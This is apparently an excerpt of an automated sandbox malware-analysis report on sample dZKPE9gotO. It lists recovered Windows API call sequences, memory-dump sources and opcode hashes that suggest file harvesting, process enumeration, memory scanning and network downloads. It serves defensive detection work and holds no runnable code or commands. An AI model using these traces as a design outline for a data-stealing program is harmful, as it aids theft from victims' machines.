                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 009B89D9
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 009B89F3
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000400), ref: 009B8A18
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 009B8A1F
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 009B8A28
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandleInternet$File$ReadWritelstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2640915698-0
                                                                                                                                                                                                                                                  • Opcode ID: 74c3c51af933105cee16bb21461a7dd861a7cf3cd62c55685cf234fe47bb9288
                                                                                                                                                                                                                                                  • Instruction ID: 1daf474dbd65d59f6101504a06f30520202ad39306e772c05980f32fcfcc45ec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74c3c51af933105cee16bb21461a7dd861a7cf3cd62c55685cf234fe47bb9288
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F44163719002599BDB10EF74DD46FEE7BB9EF88350F009019F905A3151DF709A4ACB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C083C
                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 009C0856
                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 009C086E
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 009C0882
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C089A
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0915
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlenstrchr$HeapProcessstrcpy_s
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2110419323-0
                                                                                                                                                                                                                                                  • Opcode ID: d83169153d75055110f27535443527958fce46b29760db2d90432ee4ea193c58
                                                                                                                                                                                                                                                  • Instruction ID: e63aafab2c3e7a4270f8a79f3308086fcc72b1838d928c47cedb0175b317c0b9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d83169153d75055110f27535443527958fce46b29760db2d90432ee4ea193c58
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F31BD75A043569FD700EF38AC80B6B7BE9AF96300F00452DF884D7352EA31DA45CBA2
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 009C3C17
                                                                                                                                                                                                                                                  • GetVolumeInformationA.KERNEL32 ref: 009C3C5E
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?), ref: 009C3C95
                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 009C3CBF
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DirectoryHeapInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                                  • API String ID: 1921768340-1037565863
                                                                                                                                                                                                                                                  • Opcode ID: 7ad6c88bac7b2b417639bc5adebd194043762363acf0846bb84d4a66be8a6070
                                                                                                                                                                                                                                                  • Instruction ID: e69ba2ea384b3fd0f377dfa114f03bce20ff45534b2b6ba6106e96b4e57503ec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ad6c88bac7b2b417639bc5adebd194043762363acf0846bb84d4a66be8a6070
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC41F674E08344ABD710AB349C46F6F7AAA9FC6354F00D41DF895572A2DB748E05C7A3
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C4D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 009C4D7F
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C9D3E
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: FindFirstFileA.KERNEL32(?,?), ref: 009C98BC
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: StrCmpCA.SHLWAPI(?,0042EEFC), ref: 009C99A2
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: PathMatchSpecA.SHLWAPI(?,?), ref: 009C9A22
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: lstrcat.KERNEL32(?,?), ref: 009C9A48
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: lstrcat.KERNEL32(?,?), ref: 009C9A81
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: lstrcat.KERNEL32(?,00644BCD), ref: 009C9A89
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: lstrcat.KERNEL32(?,?), ref: 009C9A97
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: FindNextFileA.KERNEL32(00000000,?), ref: 009C9CB6
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: FindClose.KERNEL32(00000000), ref: 009C9CC5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$FilePath$CloseFirstFolderMatchNextSpeclstrcpy
                                                                                                                                                                                                                                                  • String ID: (2c$@2c$T2c$`2c
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009CA0B5
                                                                                                                                                                                                                                                    • Part of subcall function 009C4D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 009C4D7F
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009CA202
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009CA324
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memset$FolderPathlstrcpy
                                                                                                                                                                                                                                                  • String ID: XLd$hLd
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009B989F: InternetReadFile.WININET(00000000,?,00001000), ref: 009B9975
                                                                                                                                                                                                                                                    • Part of subcall function 009B989F: InternetReadFile.WININET(00000000,?,00001000), ref: 009B999B
                                                                                                                                                                                                                                                    • Part of subcall function 009B989F: InternetCloseHandle.WININET(00000000), ref: 009B99AD
                                                                                                                                                                                                                                                    • Part of subcall function 009B989F: InternetCloseHandle.WININET(19d), ref: 009B99B7
                                                                                                                                                                                                                                                    • Part of subcall function 009C29F5: strlen.MSVCRT ref: 009C2A05
                                                                                                                                                                                                                                                    • Part of subcall function 009C29F5: memcmp.MSVCRT(?,?,00000000,?,?,?,?,009BAA4F,0042EEFC,?), ref: 009C2A2C
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009BAAFC
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,0042EEFC,?,?,00643A38), ref: 009BABBB
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,0042EEFC,?,?,00643A38), ref: 009BABD2
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009BAC3F
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009BAC6F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandleReadlstrcat$memcmpmemcpymemsetstrlen
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 009C3421
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 009C343F
                                                                                                                                                                                                                                                    • Part of subcall function 009C3239: strlen.MSVCRT ref: 009C3245
                                                                                                                                                                                                                                                    • Part of subcall function 009C3239: strlen.MSVCRT ref: 009C3309
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C345E
                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 009C349D
                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(00000000,?,?,00000000), ref: 009C3596
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: strlen$QueryVirtualmemset
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C971F
                                                                                                                                                                                                                                                    • Part of subcall function 009C4D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 009C4D7F
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C9756
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C9764
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C9771
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C977B
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C9788
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009C92FC: GetProcessHeap.KERNEL32 ref: 009C930E
                                                                                                                                                                                                                                                    • Part of subcall function 009C92FC: FindFirstFileA.KERNEL32(?,?), ref: 009C936A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$FileFindFirstFolderHeapPathProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1841389222-0
                                                                                                                                                                                                                                                  • Opcode ID: 012c3e621e2da63ea20026f09311a93b24641852794f56bc12d7c9dcc3b6d911
                                                                                                                                                                                                                                                  • Instruction ID: 016fd30d8803b9981a70081b0afacd2d3419147125488f19a11f6513249c5446
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 012c3e621e2da63ea20026f09311a93b24641852794f56bc12d7c9dcc3b6d911
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51418172D00A59ABCB11EBA0DC56FEE77BDAFC9300B00951DF64653052DB34A785CBA2
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0041FB8B
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0041FBBC
                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041FBF0
                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041FC00
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041FC32
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F77F
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F7C3
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7DF
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: ReadFile.KERNEL32(?,?,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7F9
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F800
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F810
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F835
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F849
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Pointer$ReadTime$HandleInformationLocalSizeSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4216084854-0
                                                                                                                                                                                                                                                  • Opcode ID: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
                                                                                                                                                                                                                                                  • Instruction ID: aeb9a57c7c30a851f1939dbb9e5bce1d4e0d01877bf27b1033796e67ae6ef790
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C31BDB1504744AFD714CB39C849AA7B7E8FF88704F404A3EF48AC6651E774E546CB20
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 009CFDF2
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 009CFE23
                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 009CFE57
                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 009CFE67
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CFE99
                                                                                                                                                                                                                                                    • Part of subcall function 009CF9D5: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009CFE13), ref: 009CF9E6
                                                                                                                                                                                                                                                    • Part of subcall function 009CF9D5: GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,009CFE13), ref: 009CFA2A
                                                                                                                                                                                                                                                    • Part of subcall function 009CF9D5: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFA46
                                                                                                                                                                                                                                                    • Part of subcall function 009CF9D5: SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFA67
                                                                                                                                                                                                                                                    • Part of subcall function 009CF9D5: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFA9C
                                                                                                                                                                                                                                                    • Part of subcall function 009CF9D5: ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFAB0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Pointer$Time$HandleInformationLocalReadSizeSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4169386603-0
                                                                                                                                                                                                                                                  • Opcode ID: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
                                                                                                                                                                                                                                                  • Instruction ID: 8f8bc88713e6a11d2d7971899d8edb593e797a56805af4a8b6532a40feef3941
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD3189B1900745AFE724CB29C859F67B7E9EF88304F104A2DF48AC6651E771E545CB21
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9AA
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9BC
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9CD
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041FA11
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,00420362,?,00000001), ref: 0041FA2D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy$FileWrite
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3457131274-0
                                                                                                                                                                                                                                                  • Opcode ID: 430fcabc74146748b10a5d1aa58081535d49e1319aacba17e3c89140f60aa00d
                                                                                                                                                                                                                                                  • Instruction ID: b713b32a0073a46aa718fb7c2f3049b9c34ab46680d856e50a716b5dcd1ad319
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 430fcabc74146748b10a5d1aa58081535d49e1319aacba17e3c89140f60aa00d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A621B6F1A00655BBD220DA25D984F97BB5CFF14394B54012BE80987A01D73CF8AAC7E9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 009BB11C
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 009BB13F
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 009BB160
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(EC8350EC), ref: 009BB17F
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009BB186
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileLocal$AllocCloseFreeHandleReadSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2363778996-0
                                                                                                                                                                                                                                                  • Opcode ID: 385fe86b5d78b41b0f96b2b6be6f24aad4e2f19d7f5df57c5e3cd0131f8f0b94
                                                                                                                                                                                                                                                  • Instruction ID: 156785dcf50a9219eeb7cebb2954d68baf8988f236fd5683c9e6811fe0081fbf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 385fe86b5d78b41b0f96b2b6be6f24aad4e2f19d7f5df57c5e3cd0131f8f0b94
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18218E76604700AFC710DF69DC45A5AB7FAFF89320F009919E996C72A0DBB0E945CB51
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0042EEFC,?,?,?,?,?,00644AE0,?,?,00644A23,?,?,?,?), ref: 009C47BE
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 009C47C8
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 009C47D8
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 009C483B
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009C4846
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2673430994-0
                                                                                                                                                                                                                                                  • Opcode ID: d9b71223fb4a6d86eb45038ce0ff4f8db6f96fd0667739d18a1f46e8e92de1e8
                                                                                                                                                                                                                                                  • Instruction ID: 606252c381bc4a0b36451eb4f6b7229d0a07c4348530803b147293a1f95fb9ca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9b71223fb4a6d86eb45038ce0ff4f8db6f96fd0667739d18a1f46e8e92de1e8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1110434B003546BE7106B219C9AF7F3E6DDFC2B68F00A41DF54582182DF798914C362
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateDCA.GDI32(00000000,00000000,00000000,?), ref: 009C486A
                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 009C4875
                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 009C4880
                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 009C488A
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,009C751A,?,?,?,00644AC5,?,?,00644A23,?,?,00000000,?,?,00644AB8,?), ref: 009C4896
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CapsDevice$CreateHeapProcessRelease
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2515617246-0
                                                                                                                                                                                                                                                  • Opcode ID: 74099194b8ff2a3052478e3cbb286403c3eeeff0735e7d7de334ae1239f9a096
                                                                                                                                                                                                                                                  • Instruction ID: f32062cfc531596e725e8258386aa3d5264975d5ef7af7a231ccb4d18609a619
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74099194b8ff2a3052478e3cbb286403c3eeeff0735e7d7de334ae1239f9a096
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC015E79641214BFE3209B61BC4AF573EAFEB63B91F012014FA0583261DEA51C1487A1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,0000000A,004150C3,00000000,?,00000000,0000000A,?,0000000A,00000000,?,0040B5D7,?), ref: 00414A86
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,000000FA,?,00000000,0000000A,?,0000000A,00000000,?,0040B5D7,?), ref: 00414A94
                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00414AA3
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                                                  • String ID: %hs
                                                                                                                                                                                                                                                  • API String ID: 659108358-2783943728
                                                                                                                                                                                                                                                  • Opcode ID: eb602275fec487db5c4cdddd0d08a58ecb9e759a3597a397cdb84320ea1c1b3d
                                                                                                                                                                                                                                                  • Instruction ID: 5bd6a179048394e7de729c67cb4f3c16f8518d2a372a11019db7bb97310c50b9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb602275fec487db5c4cdddd0d08a58ecb9e759a3597a397cdb84320ea1c1b3d
